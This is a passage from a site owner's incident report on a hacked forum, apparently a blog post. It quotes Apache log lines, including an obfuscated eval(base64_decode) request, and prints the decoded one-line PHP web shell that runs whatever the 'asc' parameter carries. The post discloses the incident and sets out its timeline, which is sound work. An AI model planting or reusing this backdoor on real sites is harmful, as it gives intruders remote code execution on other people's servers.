200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.